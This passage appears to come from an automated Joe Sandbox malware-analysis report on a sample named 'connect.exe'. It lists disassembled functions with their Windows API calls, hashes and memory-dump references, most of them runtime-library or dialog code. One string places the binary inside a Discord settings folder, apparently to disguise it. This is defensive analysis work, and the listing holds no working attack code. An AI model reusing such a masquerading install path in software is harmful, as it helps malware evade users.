                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 33e72a6a7b28e79f964b3acbf4f4363facca18292bcf9f2b0fb890cf43c66209
                                                            • Instruction ID: ececd68e7e2f4b3f420be9d63101cfe21f6369b9f2d7a5e05bed25744d6dbf89
                                                            • Opcode Fuzzy Hash: 33e72a6a7b28e79f964b3acbf4f4363facca18292bcf9f2b0fb890cf43c66209
                                                            • Instruction Fuzzy Hash: CB41C132A40204AFCB14DF78C981A9EB7A6EF84314F15456EE515EB381DB35ED42CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F859 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041F862
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F885
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041F8AB
                                                            • _free.LIBCMT ref: 0041F8BE
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F8CD
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 9749fb025d7a37d387c804815beec108e65d29ba413356cfbfbc5df52578c171
                                                            • Instruction ID: b9f1cb8d9237dcc0b938d4428642e883e616535c5276838ab12e98693ce5b31e
                                                            • Opcode Fuzzy Hash: 9749fb025d7a37d387c804815beec108e65d29ba413356cfbfbc5df52578c171
                                                            • Instruction Fuzzy Hash: 9501B1B2A012107B23312AA65C88CFB6A6DDEC2BA4315013BFC05D3200EB78DD4781B8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041D5A1 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0041CFC8,0041DFEF,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253), ref: 0041D5A6
                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D), ref: 0041D5CC
                                                            • _free.LIBCMT ref: 0041D60C
                                                            • _free.LIBCMT ref: 0041D63F
                                                            • SetLastError.KERNEL32(00000000,0040126C,?,00401867), ref: 0041D64C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 44514d98ae63417f13340f409500db8e4d1a2fc31f206781e771d855f67a1275
                                                            • Instruction ID: 58ffaf330fddcc24637d40501c605f2f4a5973d36194360523c9a40821f95451
                                                            • Opcode Fuzzy Hash: 44514d98ae63417f13340f409500db8e4d1a2fc31f206781e771d855f67a1275
                                                            • Instruction Fuzzy Hash: 1C11A9F2A00500769A15373A5C45DDB265E9FC2379B250A3BF439922D5EE6DCC82916C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041D453 Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,0041B037,00000000,00000002,hC@,0041A973,hC@,00000000,00000001,00426DB8,?,0000000A,00000001), ref: 0041D457
                                                            • _free.LIBCMT ref: 0041D4AE
                                                            • _free.LIBCMT ref: 0041D4E2
                                                            • SetLastError.KERNEL32(00000000,00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D4EF
                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D4FB
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 1495ff30ff85ec3c023853325edc158b05fdf25e26e8059604bbbb6395dc4964
                                                            • Instruction ID: 3092c8266c7ce1bf26d9b12d454e5cb91484aca7055e4000faa6deb73137ecfe
                                                            • Opcode Fuzzy Hash: 1495ff30ff85ec3c023853325edc158b05fdf25e26e8059604bbbb6395dc4964
                                                            • Instruction Fuzzy Hash: A01100F1E0050066D625772A5C07DEB11159FC1375F21473FFC35912E5EE7CA882915D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042039F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 004203B7
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 004203C9
                                                            • _free.LIBCMT ref: 004203DB
                                                            • _free.LIBCMT ref: 004203ED
                                                            • _free.LIBCMT ref: 004203FF
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 81a4994557c7d6480d84085b145d34b0bfaf80dfde955fa9f37b50cf8be9d044
                                                            • Instruction ID: fcfcfa32e17f5caa0faf2d8080e5c36b48078adf9567de0138a5079bbefe4fc5
                                                            • Opcode Fuzzy Hash: 81a4994557c7d6480d84085b145d34b0bfaf80dfde955fa9f37b50cf8be9d044
                                                            • Instruction Fuzzy Hash: 6BF0F472604210A7D514EF55F485C5B73DABE007157A5191BF858D7616CB7CFC80865C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004097EB Relevance: 7.5, APIs: 5, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                            • SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004099F0: SetWindowTextW.USER32(?,00000000), ref: 004099F9
                                                            • GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                            • SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$FocusMessageSendTextWindow
                                                            • String ID:
                                                            • API String ID: 3590784419-0
                                                            • Opcode ID: 033edb6ec6125df0c708b24c68fc6e4b40be69edeb2f69f4220b3c158c039254
                                                            • Instruction ID: 39827cd0fbc3a929d3b34e7fab1fc4ed2f791beef7a7c0c78c019050e93946a5
                                                            • Opcode Fuzzy Hash: 033edb6ec6125df0c708b24c68fc6e4b40be69edeb2f69f4220b3c158c039254
                                                            • Instruction Fuzzy Hash: BDE03071601110BBCB206F569C49D877E1DEF853617068474FA08A7162C7698800DBB8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041BF37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                            • API String ID: 0-390259182
                                                            • Opcode ID: 111cd3651553a6d4168eefd1d4d16f2113697d2a64ce08470771d408e347c24b
                                                            • Instruction ID: 51c2468c9d451a310d12df1be9d93847f68e6aed6009ad882399aa7680dd426f
                                                            • Opcode Fuzzy Hash: 111cd3651553a6d4168eefd1d4d16f2113697d2a64ce08470771d408e347c24b
                                                            • Instruction Fuzzy Hash: D7416271A40214EBDB25AF99DC819EFBBF8EB89710F10406BF804D7351D7784A81CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407D01 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00407D2F
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00407D4C
                                                            • SHGetMalloc.SHELL32(00000000), ref: 00407D76
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                              • Part of subcall function 004097EB: SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                              • Part of subcall function 004097EB: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$BrowseFocusFolderFromListMallocMessagePathSend
                                                            • String ID: A
                                                            • API String ID: 3792050300-3554254475
                                                            • Opcode ID: 14c7aece01bd12a8c84251cd4e175fcaae4cee4bb6c6305651c826d36e0f94eb
                                                            • Instruction ID: 484935ab0e277ae0e46ed58a52f3b613967eb7b8327585298685f74397bbae8c
                                                            • Opcode Fuzzy Hash: 14c7aece01bd12a8c84251cd4e175fcaae4cee4bb6c6305651c826d36e0f94eb
                                                            • Instruction Fuzzy Hash: 14115175A11218EBCB20EB61C948BEF7BBCEF44714F1000AAE405E7241DB38EE04CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420524 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,00000001,?,?,00000001,?), ref: 0042056C
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004205E1
                                                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004205F3
                                                            • __freea.LIBCMT ref: 004205FC
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: d6e8b623a161da365e38435ff4633c02d8fcbaf495d22808be002b2d1b882e8f
                                                            • Instruction ID: 8997c37907084a4759b34edd737498d4f22ad15365821359fe52503b3ea4f02a
                                                            • Opcode Fuzzy Hash: d6e8b623a161da365e38435ff4633c02d8fcbaf495d22808be002b2d1b882e8f
                                                            • Instruction Fuzzy Hash: 4431A271A0122AAFDB20DF65EC45DAF7BB9EF84310F45452AFC0497252D7388D91CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408CE3 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408D46
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408D62
                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408D75
                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00007D9B), ref: 00408D83
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                              • Part of subcall function 004097EB: SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                              • Part of subcall function 004097EB: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShow
                                                            • String ID:
                                                            • API String ID: 2966018739-0
                                                            • Opcode ID: 891d48e6d885c4051aaf10ae602797f785369bdb95fc75ab652f9af905f81f2c
                                                            • Instruction ID: 52fcfb73fba0d8a4eede4717299014a8330c9950d031e290fc19fe3ee4faf3e5
                                                            • Opcode Fuzzy Hash: 891d48e6d885c4051aaf10ae602797f785369bdb95fc75ab652f9af905f81f2c
                                                            • Instruction Fuzzy Hash: FE1166B2E0031577DB10ABA5DD49F9EB7ADAF44314F400466B605E32C1DA78DD048B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C3BA Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3dd9033269c76c64176d7caa715b901faf46b904c1f5dd3c28fda8c014673bad
                                                            • Instruction ID: 12418fe40b066a57b9d4cfca5842536bf680361dbd75dc530f0953e0cecb5793
                                                            • Opcode Fuzzy Hash: 3dd9033269c76c64176d7caa715b901faf46b904c1f5dd3c28fda8c014673bad
                                                            • Instruction Fuzzy Hash: D1018FF264921A7EE6202A697CC1FB7631DEF513B9B21432BB932512D1DA688C918168
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040819D Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004081C5
                                                            • GetSystemMetrics.USER32(00000031), ref: 004081EB
                                                            • CreateFontIndirectW.GDI32(?), ref: 004081FB
                                                            • DeleteObject.GDI32(00000000), ref: 00408227
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                            • String ID:
                                                            • API String ID: 1900162674-0
                                                            • Opcode ID: 4c958fa4e9ac4a09b6c614f7e987873b37860086f1e017261676ca38575e3f78
                                                            • Instruction ID: 83b1e8216462dc461ca8975bde4790081f0cf36b3255f5c1ce75f83787d0dbca
                                                            • Opcode Fuzzy Hash: 4c958fa4e9ac4a09b6c614f7e987873b37860086f1e017261676ca38575e3f78
                                                            • Instruction Fuzzy Hash: 74119172A0021AAFDB208F58DD44AABB7BCEF44314F0142BEAD55B7381DE719D45CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004181FA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00418214
                                                              • Part of subcall function 00418161: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00418190
                                                              • Part of subcall function 00418161: ___AdjustPointer.LIBCMT ref: 004181AB
                                                            • _UnwindNestedFrames.LIBCMT ref: 00418229
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0041823A
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00418262
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 110da7d1c6ce5bea61a2aec282f92c69db10d6b3118e185abc890ba49dcb9387
                                                            • Instruction ID: f0983afbc049e34547686b481b637fa22996f917881db898d77e52edef786c7c
                                                            • Opcode Fuzzy Hash: 110da7d1c6ce5bea61a2aec282f92c69db10d6b3118e185abc890ba49dcb9387
                                                            • Instruction Fuzzy Hash: F4012D32100148BBDF126E96CC41EEB7B79EF58754F04440DFE1856121DB39E8A19BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409F59 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ScreenToClient.USER32(?,?), ref: 00409F93
                                                            • GetClientRect.USER32(?,?), ref: 00409FA5
                                                            • PtInRect.USER32(?,?,?), ref: 00409FB4
                                                              • Part of subcall function 00408368: KillTimer.USER32(?,00000001), ref: 00408376
                                                            • CallNextHookEx.USER32(?,?,?), ref: 00409FD6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ClientRect$CallHookKillNextScreenTimer
                                                            • String ID:
                                                            • API String ID: 3015594791-0
                                                            • Opcode ID: 26fe7d0266281f3b4288cd1d4d9b810bac27ffa63845a16c1b69f14bf847b9e8
                                                            • Instruction ID: 538399906b82882c6edfc5c3e687f9f2eaf72537761c978574a7efa5399b4524
                                                            • Opcode Fuzzy Hash: 26fe7d0266281f3b4288cd1d4d9b810bac27ffa63845a16c1b69f14bf847b9e8
                                                            • Instruction Fuzzy Hash: 00015731200106EFCB60EF55DD14DAA7BA9FF08300B05857AF806E62A2DB75EC51DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040983E Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00409859
                                                            • CreateFontIndirectW.GDI32(?), ref: 0040986F
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00409883
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040988F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                            • String ID:
                                                            • API String ID: 2001801573-0
                                                            • Opcode ID: 39c369573bc1e5b3d8b57993de26fe0e07480bf494ad97b7ed7170ac94c06351
                                                            • Instruction ID: 343021f11795ca5765bd44718630135f581bf7d4d1ad10db3a9c73449ff14822
                                                            • Opcode Fuzzy Hash: 39c369573bc1e5b3d8b57993de26fe0e07480bf494ad97b7ed7170ac94c06351
                                                            • Instruction Fuzzy Hash: 72F0BE76A00704ABDB306BA4DD0DF8B7FAC9F44B11F454039BE01B22D5EBB4E8058A28
                                                            Uniqueness

